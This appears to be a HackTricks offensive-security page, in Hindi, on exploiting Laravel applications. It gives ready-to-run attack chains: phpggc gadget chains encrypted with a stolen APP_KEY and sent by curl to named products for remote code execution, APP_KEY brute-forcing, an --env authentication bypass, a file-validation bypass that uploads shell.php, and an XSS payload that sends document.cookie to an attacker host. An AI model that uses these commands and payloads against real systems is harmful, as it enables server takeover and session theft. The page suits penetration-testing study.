Laravel

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

• सदस्यता योजनाओं की जांच करें!
• हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
• हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।

Laravel SQLInjection

इस बारे में जानकारी यहाँ पढ़ें: https://stitcher.io/blog/unsafe-sql-functions-in-laravel

APP_KEY & एन्क्रिप्शन के आंतरिक तत्व (Laravel >=5.6)

Laravel आंतरिक रूप से AES-256-CBC (या GCM) को HMAC integrity के साथ उपयोग करता है (Illuminate\Encryption\Encrypter)। अंत में जो कच्चा ciphertext sent to the client होता है वह Base64 of a JSON object जैसा होता है:

{
"iv"   : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
"tag"  : ""                 // only used for AEAD ciphers (GCM)
}

encrypt($value, $serialize=true) डिफ़ॉल्ट रूप से plaintext को serialize() करेगा, जबकि decrypt($payload, $unserialize=true) स्वचालित रूप से unserialize() करेगा decrypted value को। इसलिए any attacker जो 32-byte secret APP_KEY जानता है, एक encrypted PHP serialized object craft कर सकता है और magic methods (__wakeup, __destruct, …) के जरिए RCE हासिल कर सकता है।

Minimal PoC (framework ≥9.x):

use Illuminate\Support\Facades\Crypt;

$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste

उत्पन्न स्ट्रिंग को किसी भी कमजोर decrypt() sink (route param, cookie, session, …) में इंजेक्ट करें।

laravel-crypto-killer 🧨

laravel-crypto-killer पूरी प्रक्रिया को स्वचालित करता है और एक सुविधाजनक bruteforce मोड जोड़ता है:

# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"

# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>

# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt

यह स्क्रिप्ट पारदर्शी रूप से दोनों CBC और GCM payloads को सपोर्ट करती है और HMAC/tag फ़ील्ड को पुनः जनरेट करती है।

वास्तविक दुनिया के कमजोर पैटर्न

शोषण वर्कफ़्लो हमेशा यह होता है:

1. 32-byte APP_KEY प्राप्त करें या brute-force करें।
2. PHPGGC के साथ एक gadget chain बनाएं (उदाहरण के लिए Laravel/RCE13, Laravel/RCE9 या Laravel/RCE15)।
3. Serialized gadget को laravel_crypto_killer.py और प्राप्त APP_KEY के साथ encrypt करें।
4. ciphertext को कमजोर decrypt() sink (route parameter, cookie, session …) में पहुँचाएँ ताकि RCE ट्रिगर हो सके।

नीचे प्रत्येक ऊपर उल्लिखित वास्तविक CVE के लिए पूरे attack path को दर्शाते हुए संक्षिप्त one-liners दिए गए हैं:

# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"

# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login

बड़े पैमाने पर APP_KEY खोज cookie brute-force के माध्यम से

क्योंकि हर नया Laravel response कम से कम 1 encrypted cookie (XSRF-TOKEN और आमतौर पर laravel_session) सेट करता है, public internet scanners (Shodan, Censys, …) leak लाखों ciphertexts जिन्हें offline में हमला किया जा सकता है।

Synacktiv (2024-2025) द्वारा प्रकाशित शोध के मुख्य निष्कर्ष:

• Dataset July 2024 » 580 k tokens, 3.99 % keys cracked (≈23 k)
• Dataset May 2025 » 625 k tokens, 3.56 % keys cracked

• 1 000 servers अभी भी legacy CVE-2018-15133 के प्रति vulnerable हैं क्योंकि tokens में सीधे serialized data होता है।

• भारी key reuse – Top-10 APP_KEYs हार्ड-कोडेड defaults हैं जो commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …) के साथ आते हैं।

निजी Go टूल nounours AES-CBC/GCM bruteforce throughput को ~1.5 billion tries/s तक बढ़ाता है, जिससे पूरे dataset की cracking <2 minutes में हो जाती है।

CVE-2024-52301 – HTTP argv/env override → auth bypass

जब PHP का register_argc_argv=On होता है (कई distros पर सामान्य), PHP query string से derive किए गए HTTP requests के लिए एक argv array expose करता है। हाल की Laravel versions इन “CLI-like” args को parse करती थीं और runtime पर --env=<value> को honor करती थीं। इसका मतलब है कि आप किसी भी URL के अंत में इसे जोड़कर current HTTP request के लिए framework environment बदल सकते हैं:

• Quick check:

• Visit https://target/?--env=local या कोई भी string और environment-dependent बदलाव देखें (debug banners, footers, verbose errors). अगर string reflect हो रही है तो override काम कर रहा है।

• Impact example (business logic trusting a special env):

• अगर app में ऐसे branches हैं जैसे if (app()->environment('preprod')) { /* bypass auth */ }, तो आप वैध creds के बिना authenticate कर सकते हैं बस login POST भेजकर:

• POST /login?--env=preprod

• Notes:

• यह per-request काम करता है, कोई persistence नहीं।

• आवश्यक है register_argc_argv=On और एक vulnerable Laravel version जो HTTP के लिए argv पढ़ती हो।

• यह उपयोगी primitive है debug envs में अधिक verbose errors surface करने या environment-gated code paths trigger करने के लिए।

• Mitigations:

• PHP-FPM/Apache के लिए register_argc_argv disable करें।

• Laravel को upgrade करें ताकि वह HTTP requests पर argv को ignore करे और production routes में app()->environment() पर आधारित किसी भी trust assumption को हटा दें।

Minimal exploitation flow (Burp):

POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf

CVE-2025-27515 – Wildcard file validation bypass (files.*)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0 में निर्मित multipart requests files.* / images.* से जुड़ी किसी भी rule को पूरी तरह स्किप कर सकती हैं। जो parser wildcard keys को expand करता है वह attacker-controlled placeholders (उदाहरण के लिए, __asterisk__ segments को pre-populate करना) से भ्रमित हो सकता है, इसलिए framework कभी भी image, mimes, dimensions, max आदि चलाए बिना UploadedFile objects को hydrate कर देगा। एक बार malicious blob Storage::putFile* में उतर जाए, आप HackTricks में पहले से सूचीबद्ध किसी भी file-upload primitive (web shells, log poisoning, signed job deserialization, …) की तरफ pivot कर सकते हैं।

पैटर्न की खोज

• स्थैतिक: rg -n "files\\.\*" -g"*.php" app/ या FormRequest क्लासेस की जांच करें जिनकी rules() ऐसी arrays लौटाती हैं जिनमें files.* शामिल हो।
• डायनामिक: प्रोडक्शन से पहले Xdebug या Laravel Telescope के माध्यम से Illuminate\Validation\Validator::validate() को hook करके उन हर request को log करें जो vulnerable rule को hit करते हैं।
• मिडलवेयर/रूट समीक्षा: एक साथ कई files bundle करने वाले endpoints (avatar importers, document portals, drag-n-drop components) आम तौर पर files.* पर भरोसा करते हैं।

व्यावहारिक एक्सप्लॉइटेशन वर्कफ़्लो

1. एक वैध upload capture करें और उसे Burp Repeater में replay करें।
2. उसी part को duplicate करें पर field name बदलें ताकि वह पहले से placeholder tokens शामिल करे (उदा., files[0][__asterisk__payload]) या एक और array नेस्ट करें (files[0][alt][0])। vulnerable builds पर, वह दूसरा part कभी validate नहीं होता लेकिन फिर भी एक UploadedFile entry बन जाता है।
3. forged file को एक PHP payload (shell.php, .phar, polyglot) की ओर इशारा करें और application को बाध्य करें कि वह इसे एक web-accessible disk (आम तौर पर public/ जब php artisan storage:link enabled हो) में store करे।

curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'

Keep fuzzing key names (files.__dot__0, files[0][0], files[0][uuid] …) until you find one that bypasses the validator but still gets written to disk; patched versions reject these crafted attribute names immediately.

Ecosystem package में chain करने लायक vulns (2025)

CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (affects auth0/laravel-auth0)

यदि प्रोजेक्ट में डिफ़ॉल्ट CookieStore backend के साथ Auth0 login प्रयोग हो रहा है और auth0/auth0-php < 8.14.0, तो auth0 session cookie पर GCM tag इतना छोटा होता है कि उसे offline brute-force किया जा सकता है। एक cookie capture करें, JSON payload बदलें (उदा., "sub":"auth0|admin" और app_metadata.roles सेट करें), tag को brute-force करें, और इसे replay करके एक वैध Laravel guard session प्राप्त करें। जल्दी चेक करने के तरीके: composer.lock में auth0/auth0-php <8.14.0 दिखता है और .env में AUTH0_SESSION_STORAGE=cookie है।

CVE-2025-48490 – lomkit/laravel-rest-api validation override

lomkit/laravel-rest-api package 2.13.0 से पहले per-action rules को गलत तरीके से merge करता है: बाद के definitions उसी attribute के लिए पहले वाले को override कर देते हैं, जिससे crafted fields validation को skip कर पाते हैं (उदा., update action के दौरान filter rules overwrite करना), जो mass assignment या unvalidated SQL-ish filters की ओर ले जाता है। व्यावहारिक जांचें:

• composer.lock में lomkit/laravel-rest-api <2.13.0 listed है।
• /_rest/users?filters[0][column]=password&filters[0][operator]== को rejected करने के बजाय accepted कर दिया जाता है, जो दिखाता है कि filter validation bypass हुआ था।

Laravel Tricks

Debugging mode

यदि Laravel debugging mode में है तो आप code और sensitive data तक पहुँच पाने में सक्षम होंगे.
उदाहरण के लिए http://127.0.0.1:8000/profiles:

यह आमतौर पर अन्य Laravel RCE CVEs का exploit करने के लिए जरूरी होता है।

CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages

• Affected: Laravel 11.9.0–11.35.1 with APP_DEBUG=true (या तो globally या misconfigured env overrides जैसे CVE-2024-52301 के जरिए forced)।
• Primitive: Whoops द्वारा render होने वाली हर uncaught exception request/route के हिस्सों को without HTML encoding echo करती है, इसलिए route या request parameter में <img src> / <script> inject करने पर authentication से पहले stored-on-response XSS मिल जाता है।
• Impact: XSRF-TOKEN चोरी करना, stack traces में secrets को leak करना, victim sessions में ब्राउज़र-आधारित pivot खोलकर _ignition/execute-solution को हिट करना, या cookies पर निर्भर passwordless dashboards के साथ chain करना।

Minimal PoC:

// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
abort(500);
});

curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"

भले ही debug मोड सामान्यतः बंद हो, background jobs या queue workers के माध्यम से त्रुटि उत्पन्न करके और _ignition/health-check endpoint को probe करने पर अक्सर वे staging hosts दिखाई देते हैं जो अभी भी यह श्रृंखला expose करते हैं।

फ़िंगरप्रिंटिंग & एक्सपोज़्ड dev endpoints

प्रोडक्शन में एक्सपोज़ किए गए Laravel stack और खतरनाक dev tooling की पहचान के लिए त्वरित जाँचें:

• /_ignition/health-check → Ignition present (debug tool used by CVE-2021-3129). यदि बिना प्रमाणीकरण पहुँचा जा सकता है, तो ऐप debug मोड में हो सकता है या misconfigured हो सकता है।
• /_debugbar → Laravel Debugbar assets; अक्सर debug mode का संकेत।
• /telescope → Laravel Telescope (dev monitor). यदि सार्वजनिक रूप से उपलब्ध है, तो व्यापक जानकारी का खुलासा और संभवतः क्रियाएँ अपेक्षित होंगी।
• /horizon → Queue dashboard; संस्करण का खुलासा और कभी-कभी CSRF-प्रोटेक्टेड कार्य।
• X-Powered-By, cookies XSRF-TOKEN and laravel_session, and Blade error pages भी फ़िंगरप्रिंट करने में मदद करते हैं।

# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done

.env

Laravel उस APP को .env नामक फ़ाइल के अंदर सहेजता है जिसका उपयोग cookies और अन्य credentials को encrypt करने के लिए किया जाता है, जिसे कुछ path traversal के जरिए /../.env के तहत एक्सेस किया जा सकता है।

Laravel यह जानकारी उस debug page के अंदर भी दिखाएगा (जो तब दिखाई देता है जब Laravel कोई error पाता है और यह सक्रिय होता है)।

Laravel की secret APP_KEY का उपयोग करके आप cookies को decrypt और re-encrypt कर सकते हैं:

Decrypt Cookie

</details>

### Laravel Deserialization RCE

प्रभावित संस्करण: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))

deserialization vulnerability के बारे में जानकारी यहाँ मिलती है: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)

आप इसे परीक्षण और exploit करने के लिए उपयोग कर सकते हैं: [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
या आप इसे metasploit के साथ भी exploit कर सकते हैं: `use unix/http/laravel_token_unserialize_exec`

### CVE-2021-3129

एक और deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)



## संदर्भ
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE‑2024‑52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)
* [CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (laravel-auth0)](https://www.wiz.io/vulnerability-database/cve/cve-2025-47275)
* [CVE-2025-48490 – lomkit/laravel-rest-api validation override](https://advisories.gitlab.com/pkg/composer/lomkit/laravel-rest-api/CVE-2025-48490/)


> [!TIP]
> AWS हैकिंग सीखें और अभ्यास करें:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> GCP हैकिंग सीखें और अभ्यास करें: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Azure हैकिंग सीखें और अभ्यास करें: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>HackTricks का समर्थन करें</summary>
>
> - [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जांच करें!
> - **हमारे** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या **हमें** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो करें।**
> - **हैकिंग ट्रिक्स साझा करें और** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) गिटहब रिपोजिटरी में PRs सबमिट करें।
>
> </details>